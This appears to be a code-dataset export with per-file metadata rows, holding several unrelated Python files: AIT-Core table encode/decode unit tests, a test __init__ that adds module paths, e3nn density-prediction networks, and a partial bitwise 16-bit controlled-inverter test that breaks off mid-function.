assert resp.status == 200, 'status is not 200'
| 65.48583
| 5,004
| 0.651623
| 2,109
| 16,175
| 4.899953
| 0.10147
| 0.078769
| 0.088059
| 0.135475
| 0.870041
| 0.835978
| 0.809657
| 0.786723
| 0.769112
| 0.753919
| 0
| 0.074181
| 0.184915
| 16,175
| 246
| 5,005
| 65.752033
| 0.709648
| 0.015456
| 0
| 0.632653
| 0
| 0.010204
| 0.50341
| 0.23175
| 0
| 0
| 0
| 0
| 0.112245
| 0
| null | null | 0.005102
| 0.045918
| null | null | 0.081633
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e76d767bc077eaf0b0b96f156f317aeedd18ada
| 12,905
|
py
|
Python
|
tests/ait/core/test_table.py
|
davidryanshay/AIT-Core
|
337da653d9c698b3d56ef1eb319c93adb6413829
|
[
"MIT"
] | 1
|
2022-01-22T13:55:49.000Z
|
2022-01-22T13:55:49.000Z
|
tests/ait/core/test_table.py
|
davidryanshay/AIT-Core
|
337da653d9c698b3d56ef1eb319c93adb6413829
|
[
"MIT"
] | 2
|
2021-09-16T19:14:52.000Z
|
2021-09-16T19:16:03.000Z
|
tests/ait/core/test_table.py
|
davidryanshay/AIT-Core
|
337da653d9c698b3d56ef1eb319c93adb6413829
|
[
"MIT"
] | null | null | null |
import datetime as dt
import inspect
import os.path
import tempfile
import unittest
import ait.core.dmc as dmc
import ait.core.dtype as dtype
from ait.core import table
test_table = """
- !FSWTable
name: test_type
delimiter: ","
header:
- !FSWColumn
name: MAGIC_NUM
desc: The first column in our header
format: "%x"
units: none
type: U8
bytes: 0
- !FSWColumn
name: UPTYPE
desc: The second column in our header
format: "%u"
units: none
type: U8
bytes: 1
- !FSWColumn
name: VERSION
desc: The third column in our header
format: "%u"
units: none
type: U8
bytes: 2
columns:
- !FSWColumn
name: COLUMN_ONE
desc: First FSW Table Column
format: "%u"
units: none
type: MSB_U16
bytes: [0,1]
- !FSWColumn
name: COLUMN_TWO
desc: Second FSW Table Column
format: "%u"
units: none
type: MSB_U16
bytes: [2,3]
- !FSWColumn
name: COLUMN_THREE
desc: Third FSW Table Column
format: "%u"
units: none
type: U8
bytes: 4
enum:
0: TEST_ENUM_0
1: TEST_ENUM_1
2: TEST_ENUM_2
3: TEST_ENUM_3
"""
class TestTableEncode(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.table_defn_path = os.path.join(tempfile.gettempdir(), "test_table.yaml")
with open(cls.table_defn_path, "w") as infile:
infile.write(test_table)
cls.tabdict = table.FSWTabDict(cls.table_defn_path)
def test_enum_encode(self):
defn = self.tabdict["test_type"]
table_data = ["13,12,11", "1,2,TEST_ENUM_3", "4,5,TEST_ENUM_0"]
encoded = defn.encode(text_in=table_data)
assert len(encoded) == 13
# Check header
assert encoded[0] == 13
assert encoded[1] == 12
assert encoded[2] == 11
# Check first row
assert encoded[3] == 0
assert encoded[4] == 1
assert encoded[5] == 0
assert encoded[6] == 2
assert encoded[7] == 3
# Check second row
assert encoded[8] == 0
assert encoded[9] == 4
assert encoded[10] == 0
assert encoded[11] == 5
assert encoded[12] == 0
def test_encode_text_no_hdr(self):
defn = self.tabdict["test_type"]
table_data = ["13,12,11", "1,2,3", "4,5,6"]
encoded = defn.encode(text_in=table_data)
assert len(encoded) == 13
# Check header
assert encoded[0] == 13
assert encoded[1] == 12
assert encoded[2] == 11
# Check first row
assert encoded[3] == 0
assert encoded[4] == 1
assert encoded[5] == 0
assert encoded[6] == 2
assert encoded[7] == 3
# Check second row
assert encoded[8] == 0
assert encoded[9] == 4
assert encoded[10] == 0
assert encoded[11] == 5
assert encoded[12] == 6
def test_encode_text_with_hdr(self):
defn = self.tabdict["test_type"]
table_data = ["1,2,3", "4,5,6"]
hdr_vals = [13, 12, 11]
encoded = defn.encode(text_in=table_data, hdr_vals=hdr_vals)
assert len(encoded) == 13
# Check header
assert encoded[0] == 13
assert encoded[1] == 12
assert encoded[2] == 11
# Check first row
assert encoded[3] == 0
assert encoded[4] == 1
assert encoded[5] == 0
assert encoded[6] == 2
assert encoded[7] == 3
# Check second row
assert encoded[8] == 0
assert encoded[9] == 4
assert encoded[10] == 0
assert encoded[11] == 5
assert encoded[12] == 6
def test_encode_file_no_hdr(self):
defn = self.tabdict["test_type"]
table_data = """
13,12,11
1,2,3
4,5,6
"""
tmp_table_input = os.path.join(tempfile.gettempdir(), "test_table.txt")
with open(tmp_table_input, "w") as in_file:
in_file.write(table_data)
with open(tmp_table_input, "r") as in_file:
encoded = defn.encode(file_in=in_file)
assert len(encoded) == 13
# Check header
assert encoded[0] == 13
assert encoded[1] == 12
assert encoded[2] == 11
# Check first row
assert encoded[3] == 0
assert encoded[4] == 1
assert encoded[5] == 0
assert encoded[6] == 2
assert encoded[7] == 3
# Check second row
assert encoded[8] == 0
assert encoded[9] == 4
assert encoded[10] == 0
assert encoded[11] == 5
assert encoded[12] == 6
os.remove(tmp_table_input)
def test_encode_file_with_hdr(self):
defn = self.tabdict["test_type"]
table_data = """
1,2,3
4,5,6
"""
hdr_vals = [13, 12, 11]
tmp_table_input = os.path.join(tempfile.gettempdir(), "test_table.txt")
with open(tmp_table_input, "w") as in_file:
in_file.write(table_data)
with open(tmp_table_input, "r") as in_file:
encoded = defn.encode(file_in=in_file, hdr_vals=hdr_vals)
assert len(encoded) == 13
# Check header
assert encoded[0] == 13
assert encoded[1] == 12
assert encoded[2] == 11
# Check first row
assert encoded[3] == 0
assert encoded[4] == 1
assert encoded[5] == 0
assert encoded[6] == 2
assert encoded[7] == 3
# Check second row
assert encoded[8] == 0
assert encoded[9] == 4
assert encoded[10] == 0
assert encoded[11] == 5
assert encoded[12] == 6
os.remove(tmp_table_input)
class TestTableDecode(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.table_defn_path = os.path.join(tempfile.gettempdir(), "test_table.yaml")
with open(cls.table_defn_path, "w") as infile:
infile.write(test_table)
cls.tabdict = table.FSWTabDict(cls.table_defn_path)
def test_decode_binary(self):
defn = self.tabdict["test_type"]
table_data = ["13,12,11", "1,2,8", "4,5,6"]
encoded = defn.encode(text_in=table_data)
decoded = defn.decode(bin_in=encoded)
# Check header
assert decoded[0][0] == 13
assert decoded[0][1] == 12
assert decoded[0][2] == 11
# Check first row
assert decoded[1][0] == 1
assert decoded[1][1] == 2
assert decoded[1][2] == 8
# Check first row
assert decoded[2][0] == 4
assert decoded[2][1] == 5
assert decoded[2][2] == 6
def test_enum_decode(self):
defn = self.tabdict["test_type"]
table_data = ["13,12,11", "1,2,TEST_ENUM_3", "4,5,TEST_ENUM_0"]
encoded = defn.encode(text_in=table_data)
bin_file = os.path.join(tempfile.gettempdir(), "test_table_in.bin")
with open(bin_file, "wb") as out_file:
out_file.write(encoded)
with open(bin_file, "rb") as out_file:
decoded = defn.decode(file_in=out_file)
# Check header
assert decoded[0][0] == 13
assert decoded[0][1] == 12
assert decoded[0][2] == 11
# Check first row
assert decoded[1][0] == 1
assert decoded[1][1] == 2
assert decoded[1][2] == "TEST_ENUM_3"
# Check first row
assert decoded[2][0] == 4
assert decoded[2][1] == 5
assert decoded[2][2] == "TEST_ENUM_0"
def test_enum_decode_raw_values(self):
defn = self.tabdict["test_type"]
table_data = ["13,12,11", "1,2,TEST_ENUM_3", "4,5,TEST_ENUM_0"]
encoded = defn.encode(text_in=table_data)
bin_file = os.path.join(tempfile.gettempdir(), "test_table_in.bin")
with open(bin_file, "wb") as out_file:
out_file.write(encoded)
with open(bin_file, "rb") as out_file:
decoded = defn.decode(file_in=out_file, raw=True)
# Check header
assert decoded[0][0] == 13
assert decoded[0][1] == 12
assert decoded[0][2] == 11
# Check first row
assert decoded[1][0] == 1
assert decoded[1][1] == 2
assert decoded[1][2] == 3
# Check first row
assert decoded[2][0] == 4
assert decoded[2][1] == 5
assert decoded[2][2] == 0
class TestBadEnumHandling(unittest.TestCase):
def test_table_duplicate_enum_load(self):
test_table = """
- !FSWTable
name: test_type
delimiter: ","
header:
- !FSWColumn
name: MAGIC_NUM
desc: The first column in our header
format: "%x"
units: none
type: U8
bytes: 0
columns:
- !FSWColumn
name: COLUMN_THREE
desc: Third FSW Table Column
format: "%u"
units: none
type: U8
bytes: 4
enum:
0: TEST_ENUM_0
1: TEST_ENUM_1
2: TEST_ENUM_2
3: TEST_ENUM_3
4: TEST_ENUM_0
"""
table_defn_path = os.path.join(
tempfile.gettempdir(), "test_table_dupe_enum.yaml"
)
with open(table_defn_path, "w") as infile:
infile.write(test_table)
with self.assertLogs("ait", level="ERROR") as cm:
tabdict = table.FSWTabDict(table_defn_path)
assert len(cm.output) == 1
class TestTableTimeHandling(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.table_defn_path = os.path.join(
tempfile.gettempdir(), "test_time_table.yaml"
)
with open(cls.table_defn_path, "w") as infile:
infile.write(
inspect.cleandoc(
"""
- !FSWTable
name: test_type
delimiter: ","
header:
- !FSWColumn
name: MAGIC_NUM
desc: The first column in our header
type: U8
bytes: 0
- !FSWColumn
name: UPTYPE
desc: The second column in our header
type: U8
bytes: 1
- !FSWColumn
name: VERSION
desc: The third column in our header
type: U8
bytes: 2
columns:
- !FSWColumn
name: COLUMN_ONE
desc: First FSW Table Column
type: TIME64
bytes: [0,7]
- !FSWColumn
name: COLUMN_TWO
desc: Second FSW Table Column
type: TIME40
bytes: [8,12]
- !FSWColumn
name: COLUMN_THREE
desc: Third FSW Table Column
type: TIME32
bytes: [13,16]
"""
)
)
cls.tabdict = table.FSWTabDict(cls.table_defn_path)
def test_end_to_end_time_handling(self):
defn = self.tabdict["test_type"]
seq_time = dt.datetime.utcnow() + dt.timedelta(days=1)
seq_time_str = seq_time.strftime(dmc.RFC3339_Format)
table_data = ["1,2,3", f"{seq_time_str}, {seq_time_str}, {seq_time_str}"]
encoded = defn.encode(text_in=table_data)
decoded = defn.decode(bin_in=encoded)
# We expect to see some loss of precision with Time40 and Time32.
# Verify that the table handling is doing what we expect here.
assert decoded[1][0] == seq_time_str
t40 = dtype.Time40Type()
assert decoded[1][1] == t40.decode(t40.encode(seq_time)).strftime(
dmc.RFC3339_Format
)
t32 = dtype.Time32Type()
assert decoded[1][2] == t32.decode(t32.encode(seq_time)).strftime(
dmc.RFC3339_Format
)
# Now format the datetime with the removal of subseconds. All the time types
# should handle this without loss of precision.
seq_time = (dt.datetime.utcnow() + dt.timedelta(days=1)).replace(microsecond=0)
seq_time_str = seq_time.strftime(dmc.RFC3339_Format)
table_data = ["1,2,3", f"{seq_time_str}, {seq_time_str}, {seq_time_str}"]
encoded = defn.encode(text_in=table_data)
decoded = defn.decode(bin_in=encoded)
assert decoded[1][0] == seq_time_str
assert decoded[1][1] == seq_time_str
assert decoded[1][2] == seq_time_str
| 27.693133
| 87
| 0.530725
| 1,619
| 12,905
| 4.077208
| 0.102532
| 0.128011
| 0.042418
| 0.031662
| 0.856385
| 0.855173
| 0.845326
| 0.821694
| 0.821694
| 0.790941
| 0
| 0.057445
| 0.361953
| 12,905
| 465
| 88
| 27.752688
| 0.744231
| 0.047269
| 0
| 0.756494
| 0
| 0
| 0.218716
| 0.002287
| 0
| 0
| 0
| 0
| 0.340909
| 1
| 0.042208
| false
| 0
| 0.025974
| 0
| 0.081169
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ee75a1e4b88027829802ef8f634065be8c69f02
| 136
|
py
|
Python
|
tests/__init__.py
|
xamQrexii/gw-proxy-serverless
|
ec7ca7db992cd0e2bd32290a33f956164b480504
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
xamQrexii/gw-proxy-serverless
|
ec7ca7db992cd0e2bd32290a33f956164b480504
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
xamQrexii/gw-proxy-serverless
|
ec7ca7db992cd0e2bd32290a33f956164b480504
|
[
"Apache-2.0"
] | null | null | null |
# add modules dependencies to test's sys.path
import sys
sys.path.append('./modules/OSBot-AWS')
sys.path.append('./modules/OSBot-Utils')
| 34
| 45
| 0.757353
| 22
| 136
| 4.681818
| 0.590909
| 0.203884
| 0.252427
| 0.38835
| 0.485437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073529
| 136
| 4
| 46
| 34
| 0.81746
| 0.316176
| 0
| 0
| 0
| 0
| 0.434783
| 0.228261
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
7d0ec0cbc80b01acacfded9a188f964e3b934727
| 7,392
|
py
|
Python
|
ml-dft-sandia/networks/e3nn_example/networks.py
|
DanielKotik/mala
|
1b89a78f5ddecb1df21d2753715001ffe4250fc1
|
[
"BSD-3-Clause"
] | 11
|
2021-09-06T18:59:24.000Z
|
2022-03-17T13:36:52.000Z
|
ml-dft-sandia/networks/e3nn_example/networks.py
|
DanielKotik/mala
|
1b89a78f5ddecb1df21d2753715001ffe4250fc1
|
[
"BSD-3-Clause"
] | 92
|
2021-09-04T06:38:14.000Z
|
2022-03-31T11:01:49.000Z
|
ml-dft-sandia/networks/e3nn_example/networks.py
|
DanielKotik/mala
|
1b89a78f5ddecb1df21d2753715001ffe4250fc1
|
[
"BSD-3-Clause"
] | 10
|
2021-09-07T13:03:30.000Z
|
2022-03-23T07:49:14.000Z
|
## networks for density prediction
import numpy as np
import torch
from functools import partial
from e3nn.kernel import Kernel
from e3nn.point.operations import Convolution
from e3nn.non_linearities import GatedBlock
from e3nn.non_linearities import rescaled_act
from e3nn.non_linearities.rescaled_act import relu, sigmoid
from e3nn.radial import CosineBasisModel
from e3nn.radial import GaussianRadialModel
class Mixer(torch.nn.Module):
def __init__(self, Op, Rs_in_s, Rs_out):
super().__init__()
self.ops = torch.nn.ModuleList([
Op(Rs_in, Rs_out)
for Rs_in in Rs_in_s
])
def forward(self, *args, n_norm=1):
# It simply sums the different outputs
y = 0
for m, x in zip(self.ops, args):
y += m(*x, n_norm=n_norm)
return y
class MixerNetwork(torch.nn.Module):
def __init__(self, Rs_in, Rs_out_list, max_radius=3.0, number_of_basis=3, radial_layers=3, basistype="Gaussian"):
super().__init__()
#sp = rescaled_act.Softplus(beta=5)
#sp = rescaled_act.ShiftedSoftplus(beta=5)
sp = torch.nn.Tanh()
# the [0] is just to get first_layer in stripped form.
# will not work for Rs_in with more than L=0
first_layer = Rs_in[0]
last_shared_layer = (2,1,1)
representations = [first_layer, last_shared_layer]
representations = [[(mul, l) for l, mul in enumerate(rs)] for rs in representations]
if (basistype == 'Gaussian'):
rad_basis = GaussianRadialModel
elif (basistype == 'Cosine'):
rad_basis = CosineBasisModel
else:
print ("Only Gaussian and Cosine Radial basis are currently supported")
RadialModel = partial(rad_basis, max_radius=max_radius,
number_of_basis=number_of_basis, h=100,
L=radial_layers, act=sp)
K = partial(Kernel, RadialModel=RadialModel)
C = partial(Convolution, K)
M = partial(Mixer, C) # wrap C to accept many input types
def make_layer(Rs_in, Rs_out):
act = GatedBlock(Rs_out, sp, sigmoid)
conv = Convolution(K, Rs_in, act.Rs_in)
return torch.nn.ModuleList([conv, act])
self.layers = torch.nn.ModuleList([
make_layer(Rs_layer_in,Rs_layer_out)
for Rs_layer_in, Rs_layer_out in zip(representations[:-1], representations[1:])
])
## set up the split final layer
m = []
for rs in Rs_out_list:
m.append(M([representations[-1], representations[-1]], rs))
# final layer is indexed in order of atom type
self.final_layer = torch.nn.ModuleList([
m[i] for i in range(len(m))
])
def forward(self, input, geometry, atom_type_map):
output = input
batch, N, _ = geometry.shape
for conv, act in self.layers:
output = conv(output, geometry, n_norm=N)
output = act(output)
## split final layer
geometry_list = []
feature_list = []
for i, item in enumerate(atom_type_map):
geometry_list.append(geometry[0][item])
feature_list.append(output[0][item])
## this is assuming that there are only two atom types!
## it should work, though for any arbitrary order of O and H in xyzfile!
featuresO = feature_list[0].unsqueeze(0)
featuresH = feature_list[1].unsqueeze(0)
geometryO = geometry_list[0].unsqueeze(0)
geometryH = geometry_list[1].unsqueeze(0)
final_layer_output = []
for i, layer in enumerate(self.final_layer):
if (i == 0):
final = layer((featuresO, geometryO, geometryO), (featuresH, geometryH, geometryO), n_norm = N)
if (i == 1):
final = layer((featuresO, geometryO, geometryH), (featuresH, geometryH, geometryH), n_norm = N)
final_layer_output.append(final)
# return list of outputO and outputH
output = final_layer_output
return output
class SplitNetwork(torch.nn.Module):
def __init__(self, Rs_in, Rs_out_list, max_radius=3.0, number_of_basis=3, radial_layers=3, basistype="Gaussian"):
super().__init__()
#sp = rescaled_act.Softplus(beta=5)
sp = rescaled_act.ShiftedSoftplus(beta=5)
#sp = torch.nn.Tanh()
# the [0] is just to get first_layer in stripped form.
# will not work for Rs_in with more than L=0
first_layer = Rs_in[0]
#last_shared_layer = (2,1,1)
last_shared_layer = (1,1,1,1,1,1)
representations = [first_layer, last_shared_layer]
representations = [[(mul, l) for l, mul in enumerate(rs)] for rs in representations]
if (basistype == 'Gaussian'):
rad_basis = GaussianRadialModel
elif (basistype == 'Cosine'):
rad_basis = CosineBasisModel
else:
print ("Only Gaussian and Cosine Radial basis are currently supported")
RadialModel = partial(rad_basis, max_radius=max_radius,
number_of_basis=number_of_basis, h=100,
L=radial_layers, act=sp)
K = partial(Kernel, RadialModel=RadialModel)
def make_layer(Rs_in, Rs_out):
act = GatedBlock(Rs_out, sp, sigmoid)
conv = Convolution(K, Rs_in, act.Rs_in)
return torch.nn.ModuleList([conv, act])
self.layers = torch.nn.ModuleList([
make_layer(Rs_layer_in,Rs_layer_out)
for Rs_layer_in, Rs_layer_out in zip(representations[:-1], representations[1:])
])
## set up the split final layer
# final layer is indexed in order of atom type
self.final_layer = torch.nn.ModuleList([
Convolution(K, representations[-1], rs) for rs in Rs_out_list
])
def forward(self, input, geometry, atom_type_map):
output = input
batch, N, _ = geometry.shape
for conv, act in self.layers:
output = conv(output, geometry, n_norm=N)
output = act(output)
## split final layer
geometry_list = []
feature_list = []
for i, item in enumerate(atom_type_map):
geometry_list.append(geometry[0][item])
feature_list.append(output[0][item])
## this is assuming that there are only two atom types!
## it should work, though for any arbitrary order of O and H in xyzfile!
featuresO = feature_list[0].unsqueeze(0)
featuresH = feature_list[1].unsqueeze(0)
geometryO = geometry_list[0].unsqueeze(0)
geometryH = geometry_list[1].unsqueeze(0)
final_layer_output = []
for i, layer in enumerate(self.final_layer):
if (i == 0):
final = layer(featuresO, geometryO)
#final = layer((featuresO, geometryO, geometryO), (featuresH, geometryH, geometryO), n_norm = N)
if (i == 1):
final = layer(featuresH, geometryH)
#final = layer((featuresO, geometryO, geometryH), (featuresH, geometryH, geometryH), n_norm = N)
final_layer_output.append(final)
# return list of outputO and outputH
output = final_layer_output
return output
| 36.594059
| 117
| 0.608766
| 948
| 7,392
| 4.556962
| 0.166667
| 0.050926
| 0.027546
| 0.014583
| 0.840741
| 0.826852
| 0.813889
| 0.813889
| 0.813889
| 0.813889
| 0
| 0.014573
| 0.294508
| 7,392
| 202
| 118
| 36.594059
| 0.813806
| 0.154356
| 0
| 0.721805
| 0
| 0
| 0.026705
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06015
| false
| 0
| 0.075188
| 0
| 0.195489
| 0.015038
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d4a7a1b95fecb1982d7d8746e02567b6b4a3505
| 21,138
|
py
|
Python
|
tests/signal/test_ControlledInverter16.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
tests/signal/test_ControlledInverter16.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
tests/signal/test_ControlledInverter16.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
import bitwise as bw
class TestControlledInverter16:
def test_ControlledInverter16(self):
enable = bw.wire.Wire()
input_1 = bw.wire.Wire()
input_2 = bw.wire.Wire()
input_3 = bw.wire.Wire()
input_4 = bw.wire.Wire()
input_5 = bw.wire.Wire()
input_6 = bw.wire.Wire()
input_7 = bw.wire.Wire()
input_8 = bw.wire.Wire()
input_9 = bw.wire.Wire()
input_10 = bw.wire.Wire()
input_11 = bw.wire.Wire()
input_12 = bw.wire.Wire()
input_13 = bw.wire.Wire()
input_14 = bw.wire.Wire()
input_15 = bw.wire.Wire()
input_16 = bw.wire.Wire()
output_1 = bw.wire.Wire()
output_2 = bw.wire.Wire()
output_3 = bw.wire.Wire()
output_4 = bw.wire.Wire()
output_5 = bw.wire.Wire()
output_6 = bw.wire.Wire()
output_7 = bw.wire.Wire()
output_8 = bw.wire.Wire()
output_9 = bw.wire.Wire()
output_10 = bw.wire.Wire()
output_11 = bw.wire.Wire()
output_12 = bw.wire.Wire()
output_13 = bw.wire.Wire()
output_14 = bw.wire.Wire()
output_15 = bw.wire.Wire()
output_16 = bw.wire.Wire()
input_bus = bw.wire.Bus16(
input_1,
input_2,
input_3,
input_4,
input_5,
input_6,
input_7,
input_8,
input_9,
input_10,
input_11,
input_12,
input_13,
input_14,
input_15,
input_16
)
output_bus = bw.wire.Bus16(
output_1,
output_2,
output_3,
output_4,
output_5,
output_6,
output_7,
output_8,
output_9,
output_10,
output_11,
output_12,
output_13,
output_14,
output_15,
output_16
)
a = bw.signal.ControlledInverter16(enable, input_bus, output_bus)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 0
input_13.value = 0
input_14.value = 0
input_15.value = 0
input_16.value = 0
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 0
input_13.value = 0
input_14.value = 0
input_15.value = 0
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 0
input_13.value = 0
input_14.value = 0
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 0
input_13.value = 0
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 0
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 0
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 0
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 0
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 0
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 0
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 0
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 0
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
input_5.value = 1
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 1
input_5.value = 1
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 0
input_3.value = 1
input_4.value = 1
input_5.value = 1
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
enable.value = 0
input_1.value = 0
input_2.value = 1
input_3.value = 1
input_4.value = 1
input_5.value = 1
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
enable.value = 0
input_1.value = 1
input_2.value = 1
input_3.value = 1
input_4.value = 1
input_5.value = 1
input_6.value = 1
input_7.value = 1
input_8.value = 1
input_9.value = 1
input_10.value = 1
input_11.value = 1
input_12.value = 1
input_13.value = 1
input_14.value = 1
input_15.value = 1
input_16.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
enable.value = 1
